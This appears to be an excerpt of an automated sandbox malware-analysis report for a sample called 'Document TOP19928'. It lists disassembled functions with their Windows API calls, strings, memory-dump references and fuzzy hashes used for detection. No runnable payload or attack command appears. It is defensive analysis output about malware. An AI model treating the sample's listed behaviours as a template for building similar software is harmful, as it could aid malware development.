Function 007D12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007D134D
SelectObject.GDI32(?,00000000), ref: 007D135C
BeginPath.GDI32(?), ref: 007D1373
SelectObject.GDI32(?,00000000), ref: 007D139C

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: df3b8020be2688d84fa7c31820da59c4485b5f3c3570d522dde066386053604e
Instruction ID: 75b08570f0387d7cd01891a547a6eba76d1c8a48c9b929cb371632b8f3eb96fb
Opcode Fuzzy Hash: df3b8020be2688d84fa7c31820da59c4485b5f3c3570d522dde066386053604e
Instruction Fuzzy Hash: 6B215070800308EFDB11AF25DD087697BB8FB10362F588237F910A66A1E77999A1DF90

Function 0082C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0082C176
_memcmp.LIBCMT ref: 0082C194
_memcmp.LIBCMT ref: 0082C1A7
_memcmp.LIBCMT ref: 0082C1BF
_memcmp.LIBCMT ref: 0082C1D7

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 0ce8119c415f2448c62f640f55f786a1eb076f654d9bbbe85f20356cf9763eda
Instruction ID: c92a506a98257debd5f76fb655d1457f108258a2192db342e94b8324d0841131
Opcode Fuzzy Hash: 0ce8119c415f2448c62f640f55f786a1eb076f654d9bbbe85f20356cf9763eda
Instruction Fuzzy Hash: FF0192A160452DBBE204A6216C47EBF775CFF213A8F844121FE14D6383EA599E61C2E0

Function 00834D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00834D5C
__beginthreadex.LIBCMT ref: 00834D7A
MessageBoxW.USER32(?,?,?,?), ref: 00834D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00834DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00834DAC

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: a4baafa8f2499b701477353dea57f0daff5019976238a6d76b40f2ab1c8cbb12
Instruction ID: 6f5050fe55a6ef25445539761bc3fe4ff14b524c957d9d28f4857c1d1358d7c6
Opcode Fuzzy Hash: a4baafa8f2499b701477353dea57f0daff5019976238a6d76b40f2ab1c8cbb12
Instruction Fuzzy Hash: 46110872904208BBC711ABB8DC08ADB7FACFB85321F184266FA14D3351D6758D0487E0

Function 0082874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00828766
GetLastError.KERNEL32(?,0082822A,?,?,?), ref: 00828770
GetProcessHeap.KERNEL32(00000008,?,?,0082822A,?,?,?), ref: 0082877F
RtlAllocateHeap.NTDLL(00000000,?,0082822A), ref: 00828786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0082879D

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
String ID:
API String ID: 883493501-0
Opcode ID: 2d4f01c994fceb13f1f8a4d32726a00f71710994aa13c6481321ea337f1c87ff
Instruction ID: 5720e49ebc11c50ce6364972ea23954bd42b994ff48925616ac47989e99c3188
Opcode Fuzzy Hash: 2d4f01c994fceb13f1f8a4d32726a00f71710994aa13c6481321ea337f1c87ff
Instruction Fuzzy Hash: 57014B71202214EFDB204FA6EC88D6B7BACFF89356B200469F949C3260DA318C50CA60

Function 008354E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00835502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00835510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00835518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00835522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0083555E

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 0f933875fd8290f568fa4c5c04472d3128540794fc203e3d080a883783be1d1a
Instruction ID: 4c8c853cf215b4cf3406095a58d6bcaafff9c54a0cf3715bf62c8f41106dd547
Opcode Fuzzy Hash: 0f933875fd8290f568fa4c5c04472d3128540794fc203e3d080a883783be1d1a
Instruction Fuzzy Hash: F3011B75D01A2DDBCF00EFE8E8485EDBB79FB49712F010456E901F2151DB34A654C7A1

Function 008285F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00828608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00828612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00828621
RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00828628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0082863E

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: befe523a58c7dd58c68fca84f2ebd629db323e7b2948b062f4987bbae4662355
Instruction ID: 43f25790b8628efac7e3a16ae1fa9eefd5aedadae04d17b5923e010862fb6b33
Opcode Fuzzy Hash: befe523a58c7dd58c68fca84f2ebd629db323e7b2948b062f4987bbae4662355
Instruction Fuzzy Hash: CBF0AF34242315EFEB210FA4EC8DE6B3BACFF89755B400025FA05C2191CB649C85DA60

Function 00828652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00828669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00828673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00828682
RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00828689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0082869F

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: b3cec53dba41095fe936182b8004a93ae301e92593ea4388f287f12a3139cf4d
Instruction ID: 44cd2af7b1b56684684eef03927c4a79c66469efd8f5167aa0a02af59aa78a9d
Opcode Fuzzy Hash: b3cec53dba41095fe936182b8004a93ae301e92593ea4388f287f12a3139cf4d
Instruction Fuzzy Hash: 4AF0AF70242314EFEB111FA4EC8CE6B3BADFF89756B140025FA05C2191CB649844DA60

Function 0082C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0082C6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 0082C6D1
MessageBeep.USER32(00000000), ref: 0082C6E9
KillTimer.USER32(?,0000040A), ref: 0082C705
EndDialog.USER32(?,00000001), ref: 0082C71F

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 6c84ab794da58f1a30163dfaa6191bb5ccd42cf8a81410b377dd612214c14fb7
Instruction ID: 7e7d7a20651acb920c4151682a5ae1c0d4dfb8fd226d8067f92451c3a1f6d2a9
Opcode Fuzzy Hash: 6c84ab794da58f1a30163dfaa6191bb5ccd42cf8a81410b377dd612214c14fb7
Instruction Fuzzy Hash: 110167305007149BEB216B64ED5EFA677F8FF14746F00056EF642E14E1DBE469948F41

Function 007D13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 007D13BF
StrokeAndFillPath.GDI32(?,?,0080BAD8,00000000,?), ref: 007D13DB
SelectObject.GDI32(?,00000000), ref: 007D13EE
DeleteObject.GDI32 ref: 007D1401
StrokePath.GDI32(?), ref: 007D141C

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 776857790dc1a67ea569573d0c8ce1b5ed8fa80e237f8ebe0dd19d77dbc3399b
Instruction ID: 4f09b0f806ae049ae300f8fe53fe74afdc235cb65bcd2a0e7a5c6507b99328c0
Opcode Fuzzy Hash: 776857790dc1a67ea569573d0c8ce1b5ed8fa80e237f8ebe0dd19d77dbc3399b
Instruction Fuzzy Hash: 9FF0AF30004748ABDB126F26EC0C7583BA4BB01326F588226F529951F2D73989A5DF60

Function 00828E74 Relevance: 7.5, APIs: 5, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00828E7F
CloseHandle.KERNEL32(?), ref: 00828E94
CloseHandle.KERNEL32(?), ref: 00828E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 00828EA5
HeapFree.KERNEL32(00000000), ref: 00828EAC

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessSingleWait
String ID:
API String ID: 3751786701-0
Opcode ID: 079179bdc16e91850151e3be98c6c041c826c63b0a67a3328f96a4e6d371dbb5
Instruction ID: 4dbc0c80f970eb709fd5b187118ba4637ec762263d90b2b7a558a1a8551761de
Opcode Fuzzy Hash: 079179bdc16e91850151e3be98c6c041c826c63b0a67a3328f96a4e6d371dbb5
Instruction Fuzzy Hash: 00E0C236044601FBDA022FE1EC0C94ABB69FB89323B508230F31981571CB3AA420DB50

Function 007E2E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 007F0FF6: std::exception::exception.LIBCMT ref: 007F102C
Part of subcall function 007F0FF6: __CxxThrowException@8.LIBCMT ref: 007F1041

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

Part of subcall function 007D7BB1: _memmove.LIBCMT ref: 007D7C0B

__swprintf.LIBCMT ref: 007E302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 007E2EC6

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 77c77bbd40b97dd0cbf719b612eacfca7577de1e038115518bbf223c7f61c42f
Instruction ID: c0ac8f3d9a51ea372ee3eb4a34e595ca9ecf6d6e00ffd4d2fdc9faecd62e52e9
Opcode Fuzzy Hash: 77c77bbd40b97dd0cbf719b612eacfca7577de1e038115518bbf223c7f61c42f
Instruction Fuzzy Hash: 2F918C71109745DFC718EF24D889C6EB7B8FF89740F00491EF5869B2A1EA28EE45CB52

Function 007F524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 007F52DD

Part of subcall function 00800340: __87except.LIBCMT ref: 0080037B

Strings

pow, xrefs: 007F52B5, 007F52D2

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 99064e632c8591c8d1105251b95f6115c7a60fb4511f29eaa6bb7009df37930e
Instruction ID: b0f4833d7a176b075aa99fc01d02bfe417a4b92b4763cf4da7ac93b4277b8420
Opcode Fuzzy Hash: 99064e632c8591c8d1105251b95f6115c7a60fb4511f29eaa6bb7009df37930e
Instruction Fuzzy Hash: DA515A61A0DE0987C7517728CD4137E2B94FF00758F244A59E395C63EAEF788CD49E8A

Function 007F023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 007F0280
+, xrefs: 007F0277

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: ccff769fb96db928e87aa33b92b868a73d8f2f40534ddeac4b1ddf3deef6359b
Instruction ID: 4a00ee6ed930d6ddcc3b74be66e4ffdc81a72b0a4bf853efda7c1dbb631c1aa0
Opcode Fuzzy Hash: ccff769fb96db928e87aa33b92b868a73d8f2f40534ddeac4b1ddf3deef6359b
Instruction Fuzzy Hash: 2451317514466ADFCF259F28D8886FA7BA4FF15310F14406AE9919B3A1D7389C82CBA0

Function 007E3297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007E33D7
_memmove.LIBCMT ref: 007E3470
_free.LIBCMT ref: 007E3496
_memmove.LIBCMT ref: 007E3549

Strings

Oa~, xrefs: 007E3482

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _memmove$_free
String ID: Oa~
API String ID: 2620147621-1339823410
Opcode ID: 6be25dfff3144af0b7ce34da3569b58490c62a7a5b676a3f27af42cdf399edb8
Instruction ID: 94a23c2faa839fc1ec1f2fb84c24064dea94df357a959cc996f49cf3e3498b0e
Opcode Fuzzy Hash: 6be25dfff3144af0b7ce34da3569b58490c62a7a5b676a3f27af42cdf399edb8
Instruction Fuzzy Hash: 55516A716093819FDB24CF29C844B6ABBE5FF89314F04492DE98ACB351EB35D941CB92

Function 007E62F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007E63A8
_memmove.LIBCMT ref: 007E6446
_memset.LIBCMT ref: 007E646A

Strings

ERCP, xrefs: 007E6313

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 6858e1da984319b9b5faf154c0dde9e9fb567afd06f7386443dc81b727b6583d
Instruction ID: 134ef10393b714e8215fb63b4e4f06248b742090733809126966b2f95ada2b12
Opcode Fuzzy Hash: 6858e1da984319b9b5faf154c0dde9e9fb567afd06f7386443dc81b727b6583d
Instruction Fuzzy Hash: 8151D471901399DBCB24CF55C885BAABBF4FF18354F20856EEA4AC7281E774D694CB40

Function 0082DA5D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121libraryloaderCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0082DAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0082DB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0082DB8E

Strings

DllGetClassObject, xrefs: 0082DB01

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ErrorMode$AddressProc
String ID: DllGetClassObject
